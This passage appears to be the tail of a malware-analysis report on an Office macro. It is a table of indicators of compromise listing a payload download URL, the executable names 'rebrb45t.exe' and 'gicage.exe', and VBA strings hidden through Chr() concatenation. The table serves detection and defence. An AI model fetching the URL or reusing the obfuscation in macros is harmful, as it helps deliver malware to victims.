  877. | IOC        | http://cardiffhairan | URL                                     |
  878. |            | |                                         |
  879. |            | tr/rebrb45t.exe      |                                         |
  880. | IOC        | rebrb45t.exe         | Executable file name                    |
  881. | IOC        | gicage.exe           | Executable file name (obfuscation: VBA  |
  882. |            |                      | expression)                             |
  883. | VBA string | GET                  | Chr(71) & Chr(69) & "T"                 |
  884. | VBA string | \gicage.exe          | Chr(92) & Chr(103) & Chr(105) & "c" &   |
  885. |            |                      | Chr(97) & "g" & "e" & Chr(46) &         |
  886. |            |                      | Chr(101) & "x" & Chr(101)               |
  887. +------------+----------------------+-----------------------------------------+
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